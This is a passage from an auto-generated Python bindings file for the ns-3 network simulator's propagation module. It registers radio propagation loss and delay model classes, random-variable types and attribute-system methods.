## vector.h (module 'core'): ns3::Vector2D [class]
module.add_class('Vector2D', import_from_module='ns.core')
## vector.h (module 'core'): ns3::Vector3D [class]
module.add_class('Vector3D', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::WeibullVariable [class]
module.add_class('WeibullVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZetaVariable [class]
module.add_class('ZetaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZipfVariable [class]
module.add_class('ZipfVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::ConstantVariable [class]
module.add_class('ConstantVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::DeterministicVariable [class]
module.add_class('DeterministicVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::EmpiricalVariable [class]
module.add_class('EmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ErlangVariable [class]
module.add_class('ErlangVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ExponentialVariable [class]
module.add_class('ExponentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::GammaVariable [class]
module.add_class('GammaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable [class]
module.add_class('IntEmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::EmpiricalVariable'])
## random-variable.h (module 'core'): ns3::LogNormalVariable [class]
module.add_class('LogNormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::NormalVariable [class]
module.add_class('NormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## random-variable.h (module 'core'): ns3::ParetoVariable [class]
module.add_class('ParetoVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## propagation-delay-model.h (module 'propagation'): ns3::PropagationDelayModel [class]
module.add_class('PropagationDelayModel', parent=root_module['ns3::Object'])
## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel [class]
module.add_class('PropagationLossModel', parent=root_module['ns3::Object'])
## propagation-delay-model.h (module 'propagation'): ns3::RandomPropagationDelayModel [class]
module.add_class('RandomPropagationDelayModel', parent=root_module['ns3::PropagationDelayModel'])
## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel [class]
module.add_class('RandomPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel [class]
module.add_class('RangePropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel [class]
module.add_class('ThreeLogDistancePropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel [class]
module.add_class('TwoRayGroundPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## propagation-delay-model.h (module 'propagation'): ns3::ConstantSpeedPropagationDelayModel [class]
module.add_class('ConstantSpeedPropagationDelayModel', parent=root_module['ns3::PropagationDelayModel'])
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel [class]
module.add_class('Cost231PropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel::Environment [enumeration]
module.add_enum('Environment', ['SubUrban', 'MediumCity', 'Metropolitan'], outer_class=root_module['ns3::Cost231PropagationLossModel'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel [class]
module.add_class('FixedRssLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel [class]
module.add_class('FriisPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411LosPropagationLossModel [class]
module.add_class('ItuR1411LosPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411NlosOverRooftopPropagationLossModel [class]
module.add_class('ItuR1411NlosOverRooftopPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## jakes-process.h (module 'propagation'): ns3::JakesProcess [class]
module.add_class('JakesProcess', parent=root_module['ns3::Object'])
## jakes-propagation-loss-model.h (module 'propagation'): ns3::JakesPropagationLossModel [class]
module.add_class('JakesPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): ns3::Kun2600MhzPropagationLossModel [class]
module.add_class('Kun2600MhzPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel [class]
module.add_class('LogDistancePropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel [class]
module.add_class('MatrixPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## mobility-model.h (module 'mobility'): ns3::MobilityModel [class]
module.add_class('MobilityModel', import_from_module='ns.mobility', parent=root_module['ns3::Object'])
## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel [class]
module.add_class('NakagamiPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## okumura-hata-propagation-loss-model.h (module 'propagation'): ns3::OkumuraHataPropagationLossModel [class]
module.add_class('OkumuraHataPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## random-variable.h (module 'core'): ns3::RandomVariableChecker [class]
module.add_class('RandomVariableChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## random-variable.h (module 'core'): ns3::RandomVariableValue [class]
module.add_class('RandomVariableValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector2DChecker [class]
module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector2DValue [class]
module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector3DChecker [class]
module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector3DValue [class]
module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
typehandlers.add_type_alias('ns3::Vector3DValue', 'ns3::VectorValue')
typehandlers.add_type_alias('ns3::Vector3DValue*', 'ns3::VectorValue*')
typehandlers.add_type_alias('ns3::Vector3DValue&', 'ns3::VectorValue&')
module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue')
typehandlers.add_type_alias('ns3::Vector3D', 'ns3::Vector')
typehandlers.add_type_alias('ns3::Vector3D*', 'ns3::Vector*')
typehandlers.add_type_alias('ns3::Vector3D&', 'ns3::Vector&')
module.add_typedef(root_module['ns3::Vector3D'], 'Vector')
typehandlers.add_type_alias('ns3::Vector3DChecker', 'ns3::VectorChecker')
typehandlers.add_type_alias('ns3::Vector3DChecker*', 'ns3::VectorChecker*')
typehandlers.add_type_alias('ns3::Vector3DChecker&', 'ns3::VectorChecker&')
module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3PropagationCache__Ns3JakesProcess_methods(root_module, root_module['ns3::PropagationCache< ns3::JakesProcess >'])
register_Ns3RandomVariable_methods(root_module, root_module['ns3::RandomVariable'])
register_Ns3SeedManager_methods(root_module, root_module['ns3::SeedManager'])
register_Ns3SequentialVariable_methods(root_module, root_module['ns3::SequentialVariable'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3TriangularVariable_methods(root_module, root_module['ns3::TriangularVariable'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3UniformVariable_methods(root_module, root_module['ns3::UniformVariable'])
register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D'])
register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D'])
register_Ns3WeibullVariable_methods(root_module, root_module['ns3::WeibullVariable'])
register_Ns3ZetaVariable_methods(root_module, root_module['ns3::ZetaVariable'])
register_Ns3ZipfVariable_methods(root_module, root_module['ns3::ZipfVariable'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3ConstantVariable_methods(root_module, root_module['ns3::ConstantVariable'])
register_Ns3DeterministicVariable_methods(root_module, root_module['ns3::DeterministicVariable'])
register_Ns3EmpiricalVariable_methods(root_module, root_module['ns3::EmpiricalVariable'])
register_Ns3ErlangVariable_methods(root_module, root_module['ns3::ErlangVariable'])
register_Ns3ExponentialVariable_methods(root_module, root_module['ns3::ExponentialVariable'])
register_Ns3GammaVariable_methods(root_module, root_module['ns3::GammaVariable'])
register_Ns3IntEmpiricalVariable_methods(root_module, root_module['ns3::IntEmpiricalVariable'])
register_Ns3LogNormalVariable_methods(root_module, root_module['ns3::LogNormalVariable'])
register_Ns3NormalVariable_methods(root_module, root_module['ns3::NormalVariable'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3ParetoVariable_methods(root_module, root_module['ns3::ParetoVariable'])
register_Ns3PropagationDelayModel_methods(root_module, root_module['ns3::PropagationDelayModel'])
register_Ns3PropagationLossModel_methods(root_module, root_module['ns3::PropagationLossModel'])
register_Ns3RandomPropagationDelayModel_methods(root_module, root_module['ns3::RandomPropagationDelayModel'])
register_Ns3RandomPropagationLossModel_methods(root_module, root_module['ns3::RandomPropagationLossModel'])
register_Ns3RangePropagationLossModel_methods(root_module, root_module['ns3::RangePropagationLossModel'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, root_module['ns3::ThreeLogDistancePropagationLossModel'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, root_module['ns3::TwoRayGroundPropagationLossModel'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3ConstantSpeedPropagationDelayModel_methods(root_module, root_module['ns3::ConstantSpeedPropagationDelayModel'])
register_Ns3Cost231PropagationLossModel_methods(root_module, root_module['ns3::Cost231PropagationLossModel'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3FixedRssLossModel_methods(root_module, root_module['ns3::FixedRssLossModel'])
register_Ns3FriisPropagationLossModel_methods(root_module, root_module['ns3::FriisPropagationLossModel'])
register_Ns3ItuR1411LosPropagationLossModel_methods(root_module, root_module['ns3::ItuR1411LosPropagationLossModel'])
register_Ns3ItuR1411NlosOverRooftopPropagationLossModel_methods(root_module, root_module['ns3::ItuR1411NlosOverRooftopPropagationLossModel'])
register_Ns3JakesProcess_methods(root_module, root_module['ns3::JakesProcess'])
register_Ns3JakesPropagationLossModel_methods(root_module, root_module['ns3::JakesPropagationLossModel'])
register_Ns3Kun2600MhzPropagationLossModel_methods(root_module, root_module['ns3::Kun2600MhzPropagationLossModel'])
register_Ns3LogDistancePropagationLossModel_methods(root_module, root_module['ns3::LogDistancePropagationLossModel'])
register_Ns3MatrixPropagationLossModel_methods(root_module, root_module['ns3::MatrixPropagationLossModel'])
register_Ns3MobilityModel_methods(root_module, root_module['ns3::MobilityModel'])
register_Ns3NakagamiPropagationLossModel_methods(root_module, root_module['ns3::NakagamiPropagationLossModel'])
register_Ns3OkumuraHataPropagationLossModel_methods(root_module, root_module['ns3::OkumuraHataPropagationLossModel'])
register_Ns3RandomVariableChecker_methods(root_module, root_module['ns3::RandomVariableChecker'])
register_Ns3RandomVariableValue_methods(root_module, root_module['ns3::RandomVariableValue'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker'])
register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue'])
register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker'])
register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue'])
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
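# Usage sketch (illustrative, not part of the generated bindings): once these
# bindings are compiled into the standard ns-3 Python modules, the attribute
# API registered above is driven through AttributeValue wrappers. The module
# names (ns.core, ns.propagation), the DoubleValue wrapper and the "Exponent"
# attribute below are assumptions taken from the usual ns-3 layout, not from
# this file:
#
#   import ns.core
#   import ns.propagation
#
#   model = ns.propagation.LogDistancePropagationLossModel()
#   model.SetAttribute("Exponent", ns.core.DoubleValue(3.0))  # SetAttribute(name, value)
#   out = ns.core.DoubleValue()
#   model.GetAttribute("Exponent", out)                       # fills 'out' in place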
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3PropagationCache__Ns3JakesProcess_methods(root_module, cls):
## propagation-cache.h (module 'propagation'): ns3::PropagationCache<ns3::JakesProcess>::PropagationCache(ns3::PropagationCache<ns3::JakesProcess> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PropagationCache< ns3::JakesProcess > const &', 'arg0')])
## propagation-cache.h (module 'propagation'): ns3::PropagationCache<ns3::JakesProcess>::PropagationCache() [constructor]
cls.add_constructor([])
## propagation-cache.h (module 'propagation'): ns3::Ptr<ns3::JakesProcess> ns3::PropagationCache<ns3::JakesProcess>::GetPathData(ns3::Ptr<ns3::MobilityModel const> a, ns3::Ptr<ns3::MobilityModel const> b, uint32_t modelUid) [member function]
cls.add_method('GetPathData',
'ns3::Ptr< ns3::JakesProcess >',
